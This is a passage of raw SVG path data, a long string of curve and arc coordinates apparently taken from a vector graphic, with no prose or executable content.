-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-